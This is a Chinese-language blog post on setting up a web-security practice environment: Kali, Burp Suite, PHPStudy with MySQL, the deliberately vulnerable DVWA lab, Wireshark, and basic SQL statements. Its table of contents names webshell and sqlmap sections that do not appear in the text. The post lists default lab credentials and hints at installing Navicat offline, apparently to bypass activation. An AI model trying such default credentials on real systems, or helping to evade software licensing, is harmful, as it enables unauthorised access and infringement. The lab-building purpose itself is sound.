<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" integrity="sha256-AbA177XfpSnFEvgpYu1jMygiLabzPCJCRIBtR5jGc0k=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"windeurynome.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.13.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac","show_result":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文章主要简单介绍了web环境一些常见工具的下载以及安装，以及一些简单靶场环境（DVWA）的搭建。">
<meta property="og:type" content="article">
<meta property="og:title" content="Web-Commontools-Install">
<meta property="og:url" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/index.html">
<meta property="og:site_name" content="The Sea &amp; Chaos">
<meta property="og:description" content="本文章主要简单介绍了web环境一些常见工具的下载以及安装，以及一些简单靶场环境（DVWA）的搭建。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202183622627.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202183547943.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202190344263.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202211219462.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202212152785.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202212358986.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202213657613.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202214431254.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202215004143.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202215157884.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202215558254.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202215715270.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202225832201.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202225957800.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202230132938.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202230518208.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202230726368.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202231153916.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202230959512.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202231737693.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202222747293.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202232317440.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202232245140.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202233318301.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202233723759.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202233916212.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202234020235.png">
<meta property="og:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202234221305.png">
<meta property="article:published_time" content="2024-12-02T13:23:44.592Z">
<meta property="article:modified_time" content="2024-12-05T07:18:20.972Z">
<meta property="article:author" content="Eurynome">
<meta property="article:tag" content="Environment">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://windeurynome.github.io/2024/12/02/web-commontools-install/image-20241202183622627.png">


<link rel="canonical" href="https://windeurynome.github.io/2024/12/02/web-commontools-install/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://windeurynome.github.io/2024/12/02/web-commontools-install/","path":"2024/12/02/web-commontools-install/","title":"Web-Commontools-Install"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Web-Commontools-Install | The Sea & Chaos</title>
  






  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>
  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">The Sea & Chaos</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">FOREVER brave & warm.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">1.</span> <span class="nav-text">安装VMware</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">2.</span> <span class="nav-text">安装kali</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">3.</span> <span class="nav-text">安装Java</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">4.</span> <span class="nav-text">安装burpsuite</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#kali"><span class="nav-number">4.1.</span> <span class="nav-text">kali</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0%E7%8E%AF%E5%A2%83"><span class="nav-number">4.2.</span> <span class="nav-text">本地环境</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">5.</span> <span class="nav-text">安装Navicat</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">6.</span> <span class="nav-text">安装PHP study+MySQL</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%85%8D%E7%BD%AEMySQL%E7%8E%AF%E5%A2%83"><span class="nav-number">6.1.</span> <span class="nav-text">配置MySQL环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%85%8D%E7%BD%AENavicat-%E5%AF%BC%E5%85%A5sql%E6%96%87%E4%BB%B6"><span class="nav-number">6.2.</span> <span class="nav-text">配置Navicat+导入sql文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%90%AD%E5%BB%BA%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83-DVWA"><span class="nav-number">6.3.</span> <span class="nav-text">搭建靶场环境-DVWA</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">7.</span> <span class="nav-text">安装Winhex</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">8.</span> <span class="nav-text">安装Wireshark</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">9.</span> <span class="nav-text">SQL语句</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E5%91%BD%E4%BB%A4"><span class="nav-number">9.1.</span> <span class="nav-text">常见命令</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">10.</span> <span class="nav-text">nmap</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8D%95%E7%9B%AE%E6%A0%87-%E5%A4%9A%E7%9B%AE%E6%A0%87-%E7%BD%91%E6%AE%B5%E6%89%AB%E6%8F%8F"><span class="nav-number">10.1.</span> <span class="nav-text">单目标&#x2F;多目标&#x2F;网段扫描</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-number">10.2.</span> <span class="nav-text">端口扫描</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">11.</span> <span class="nav-text">sqlmap</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#sqlmap%E5%9F%BA%E7%A1%80%E6%B3%A8%E5%85%A5"><span class="nav-number">11.1.</span> <span class="nav-text">sqlmap基础注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">12.</span> <span class="nav-text">webshell</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="nav-number">12.1.</span> <span class="nav-text">一句话木马</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">13.</span> <span class="nav-text">burp suite</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Proxy"><span class="nav-number">13.1.</span> <span class="nav-text">Proxy</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#intercept"><span class="nav-number">13.1.1.</span> <span class="nav-text">intercept</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#http-history"><span class="nav-number">13.1.2.</span> <span class="nav-text">http history</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#option"><span class="nav-number">13.1.3.</span> <span class="nav-text">option</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Intrude"><span class="nav-number">13.2.</span> <span class="nav-text">Intrude</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Repeater"><span class="nav-number">13.3.</span> <span class="nav-text">Repeater</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8A%93%E5%8C%85%E7%A4%BA%E4%BE%8B"><span class="nav-number">13.4.</span> <span class="nav-text">抓包示例</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">14.</span> <span class="nav-text">Winhex查看文件</span></a></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">15.</span> <span class="nav-text">流量分析流程</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E4%B8%AA%E7%95%8C%E9%9D%A2"><span class="nav-number">15.1.</span> <span class="nav-text">三个界面</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E4%BD%93%E5%88%86%E6%9E%90"><span class="nav-number">15.2.</span> <span class="nav-text">总体分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90"><span class="nav-number">15.3.</span> <span class="nav-text">详细分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E6%8F%90%E5%8F%96"><span class="nav-number">15.4.</span> <span class="nav-text">数据提取</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Eurynome</p>
  <div class="site-description" itemprop="description">Recording...</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">41</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">63</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="Back to top">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://windeurynome.github.io/2024/12/02/web-commontools-install/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Eurynome">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="The Sea & Chaos">
      <meta itemprop="description" content="Recording...">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Web-Commontools-Install | The Sea & Chaos">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Web-Commontools-Install
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-12-02 21:23:44" itemprop="dateCreated datePublished" datetime="2024-12-02T21:23:44+08:00">2024-12-02</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-12-05 15:18:20" itemprop="dateModified" datetime="2024-12-05T15:18:20+08:00">2024-12-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Configuration/" itemprop="url" rel="index"><span itemprop="name">Configuration</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Symbols count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Symbols count in article: </span>
      <span>8k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>7 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>本文章主要简单介绍了web环境一些常见工具的下载以及安装，以及一些简单靶场环境（DVWA）的搭建。</p>
<span id="more"></span><!--toc-->
<h1>安装VMware</h1>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.vmware.com/">VMware by Broadcom - Cloud Computing for the Enterprise</a></p>
</blockquote>
<ul>
<li>安装VMware WorkStation Pro</li>
<li>安装虚拟环境便于多平台集成使用</li>
</ul>
<h1>安装kali</h1>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.kali.org/get-kali/#kali-virtual-machines">Get Kali | Kali Linux</a></p>
</blockquote>
<img src="/2024/12/02/web-commontools-install/image-20241202183622627.png" class="" title="image-20241202183622627">
<p>下载下来的压缩包，直接解压缩，使用VMware打开对应文件夹下的文件，即可直接导入kali虚拟环境。</p>
<p>默认用户名：kali</p>
<p>默认密码：kali</p>
<h1>安装Java</h1>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/JasonXu94/article/details/143726390">Java8（JDK1.8）最新下载安装教程，附详细图文，适合新手，建议收藏_java 1.8下载-CSDN博客</a></p>
</blockquote>
<ul>
<li>主要需要配置<strong>环境变量</strong>
<ul>
<li>Path</li>
<li>创建JAVA_HOME，jdk的安装路径</li>
</ul>
</li>
<li>控制面板-系统-高级属性设置</li>
<li>查看是否安装成功
<ul>
<li>运行<code>java -version</code></li>
</ul>
</li>
</ul>
<img src="/2024/12/02/web-commontools-install/image-20241202183547943.png" class="" title="image-20241202183547943">
<h1>安装burpsuite</h1>
<h2 id="kali">kali</h2>
<p>kali自带burpsuite，一般直接调用工具库即可。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202190344263.png" class="" title="image-20241202190344263">
<img src="/2024/12/02/web-commontools-install/image-20241202211219462.png" class="" title="image-20241202211219462">
<ul>
<li>
<p>利用<strong>burpsuite自带的浏览器</strong>，不需要额外配置就可以实现抓包</p>
</li>
<li>
<p>部分无法进行抓包，可参考<strong>本地环境进行配置</strong>实现抓包</p>
</li>
</ul>
<h2 id="本地环境">本地环境</h2>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://t0data.gitbooks.io/burpsuite/content/chapter1.html">第一章 Burp Suite 安装和环境配置 · burpsuite实战指南</a></p>
</blockquote>
<ul>
<li>推荐使用firefox浏览器</li>
<li>安装插件-FoxyProxy</li>
<li>Option-Proxy，进行代理配置，<code>127.0.0.1:8080</code></li>
<li>访问：<code>http://burp</code>进行测试
<ul>
<li>Intercept-off</li>
<li>插件代理-on</li>
</ul>
</li>
</ul>
<img src="/2024/12/02/web-commontools-install/image-20241202212152785.png" class="" title="image-20241202212152785">
<h1>安装Navicat</h1>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzA4MjU4MTg2Ng==&amp;action=getalbum&amp;album_id=3421653652102742021">https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzA4MjU4MTg2Ng==&amp;action=getalbum&amp;album_id=3421653652102742021</a></p>
</blockquote>
<ul>
<li>一定记得断网进行实现</li>
</ul>
<img src="/2024/12/02/web-commontools-install/image-20241202212358986.png" class="" title="image-20241202212358986">
<h1>安装PHP study+MySQL</h1>
<h2 id="配置MySQL环境">配置MySQL环境</h2>
<img src="/2024/12/02/web-commontools-install/image-20241202213657613.png" class="" title="image-20241202213657613">
<p>进入命令行，使用<code>mysql --version</code>发现没成功。</p>
<p>打开<code>网站</code>，进入根目录，进入<code>Extensions</code>，把<code>MySQL</code>对应的目录进行复制。</p>
<p>配置环境变量，把复制的变量放在系统变量中。</p>
<p>默认用户名以及密码为<code>root</code>。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202214431254.png" class="" title="image-20241202214431254">
<p>命令行登录：<code>mysql -u [username] -p</code>，回车之后填入mysql对应的密码。</p>
<h2 id="配置Navicat-导入sql文件">配置Navicat+导入sql文件</h2>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/tkf021004/article/details/136098343">【MySQL】如何运行sql文件（以Navicat做演示）_navicat运行sql文件-CSDN博客</a></p>
</blockquote>
<p>在上面成功的基础上，新建连接，输入对应的用户名以及密码。</p>
<p>测试连接，连接成功之后即可建立连接。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202215004143.png" class="" title="image-20241202215004143">
<p><strong>字符集：</strong><br>
如果你的数据库版本为5.x :选择utf8<br>
如果你的数据库版本为8.0 :选择utf8mb4</p>
<img src="/2024/12/02/web-commontools-install/image-20241202215157884.png" class="" title="image-20241202215157884">
<p>新建成功后，双击或者右击选择打开数据库，变成绿色之后，表明正常运行。</p>
<p>打开的基础上，右击<code>运行sql文件</code>。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202215558254.png" class="" title="image-20241202215558254">
<p>无严重报错就可导入sql文件。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202215715270.png" class="" title="image-20241202215715270">
<p>能执行成功，记得关闭数据库，然后重新打开，就能直接看到导入后的数据文件。</p>
<h2 id="搭建靶场环境-DVWA">搭建靶场环境-DVWA</h2>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/digininja/DVWA">GitHub - digi；ninja/DVWA: Damn Vulnerable Web Application (DVWA)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/2302_82189125/article/details/135834194">如何搭建 DVWA 靶场保姆级教程（附链接）_dvwa靶场搭建-CSDN博客</a></p>
<p>其他靶场环境：pikachu</p>
</blockquote>
<img src="/2024/12/02/web-commontools-install/image-20241202225832201.png" class="" title="image-20241202225832201">
<p>新建数据库之前一般会要求修改<code>root</code>密码，新建数据库之后，再重新连接Navicat。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202225957800.png" class="" title="image-20241202225957800">
<p>配置网站。</p>
<p>使用设置的用户名以及密码登录网站。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202230132938.png" class="" title="image-20241202230132938">
<p>标红的部分需要进行修改。</p>
<p><code>reCAPTCHA key</code>，在<code>DVWA/conifg.ini.php</code>中进行新增。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202230518208.png" class="" title="image-20241202230518208">
<p>刷新后可看到修改。</p>
<p>其他参数，在<code>php.xxx/php.ini</code>中修改。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202230726368.png" class="" title="image-20241202230726368">
<p>保存后，选择页面的<code>Create Database</code>，然后重新登录。</p>
<p>此时使用的用户名以及密码分别为<code>admin</code>以及<code>password</code>。（有5个默认用户名及密码）</p>
<img src="/2024/12/02/web-commontools-install/image-20241202231153916.png" class="" title="image-20241202231153916">
<p>进入到靶场环境。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202230959512.png" class="" title="image-20241202230959512">
<p>可修改靶场难度。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202231737693.png" class="" title="image-20241202231737693">
<h1>安装Winhex</h1>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://www.winhex.com/winhex/">http://www.winhex.com/winhex/</a></p>
</blockquote>
<ul>
<li>查看文件16进制：文件类型相对较多，图片文件、音频文件、应用程序文件</li>
<li>查看镜像文件</li>
</ul>
<h1>安装Wireshark</h1>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.wireshark.org/download.html">Wireshark · Download</a></p>
</blockquote>
<ul>
<li>进行<strong>流量包分析</strong></li>
<li>文件后缀名：<code>.pcap</code>/<code>.pcapng</code></li>
</ul>
<h1>SQL语句</h1>
<blockquote>
<p>不区分大小写，有Navicat的情况下，可视化后相对容易查看执行后的结果。</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/sql/sql-syntax.html">SQL 语法 | 菜鸟教程</a></p>
</blockquote>
<ul>
<li>使用数据库：<code>USE [DATABASE];</code></li>
<li>查看所有表格：<code>SHOW TABLES;</code></li>
<li>查看某张表的所有数据：<code>SELECT * FROM [TABLE]</code></li>
<li>查看某列的所有数据：<code>SELECT [COLUMN] FROM [TABLE];</code></li>
<li>查看指定表指定数据（条件）+ <code>WHERE</code>：<code>SELECT * FROM [TABLE] WHERE [CONDITION]</code></li>
</ul>
<p><em>where 子句又被称为条件子句，用于筛选查询出来的数据集，指定的条件语句中可以使用基本的算术、关系和逻辑运算，例如：&gt;,&lt;,=,!=,&amp;&amp;,||。</em></p>
<ul>
<li>……</li>
</ul>
<h2 id="常见命令">常见命令</h2>
<ul>
<li><strong>SELECT</strong> - 从数据库中提取数据</li>
<li><strong>UPDATE</strong> - 更新数据库中的数据</li>
<li><strong>DELETE</strong> - 从数据库中删除数据</li>
<li><strong>INSERT INTO</strong> - 向数据库中插入新数据</li>
<li><strong>CREATE DATABASE</strong> - 创建新数据库</li>
<li><strong>ALTER DATABASE</strong> - 修改数据库</li>
<li><strong>CREATE TABLE</strong> - 创建新表</li>
<li><strong>ALTER TABLE</strong> - 变更（改变）数据库表</li>
<li><strong>DROP TABLE</strong> - 删除表</li>
</ul>
<p><strong>SELECT</strong>：用于从数据库中查询数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT column_name(s)</span><br><span class="line">FROM table_name</span><br><span class="line">WHERE condition</span><br><span class="line">ORDER BY column_name [ASC|DESC];</span><br></pre></td></tr></table></figure>
<ul>
<li><code>column_name(s)</code>: 要查询的列。</li>
<li><code>table_name</code>: 要查询的表。</li>
<li><code>condition</code>: 查询条件（可选）。</li>
<li><code>ORDER BY</code>: 排序方式，<code>ASC</code> 表示升序，<code>DESC</code> 表示降序（可选）。</li>
</ul>
<p><strong>INSERT INTO</strong>：用于向数据库表中插入新数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO table_name (column1, column2, ...)</span><br><span class="line">VALUES (value1, value2, ...)</span><br></pre></td></tr></table></figure>
<ul>
<li><code>table_name</code>: 要插入数据的表。</li>
<li><code>column1, column2, ...</code>: 要插入数据的列。</li>
<li><code>value1, value2, ...</code>: 对应列的值。</li>
</ul>
<p><strong>UPDATE</strong>：用于更新数据库表中的现有数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">UPDATE table_name</span><br><span class="line">SET column1 = value1, column2 = value2, ...</span><br><span class="line">WHERE condition</span><br></pre></td></tr></table></figure>
<ul>
<li><code>table_name</code>: 要更新数据的表。</li>
<li><code>column1 = value1, column2 = value2, ...</code>: 要更新的列及其新值。</li>
<li><code>condition</code>: 更新条件。</li>
</ul>
<p><strong>DELETE</strong>：用于从数据库表中删除数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">DELETE FROM table_name</span><br><span class="line">WHERE condition</span><br></pre></td></tr></table></figure>
<ul>
<li><code>table_name</code>: 要删除数据的表。</li>
<li><code>condition</code>: 删除条件。</li>
</ul>
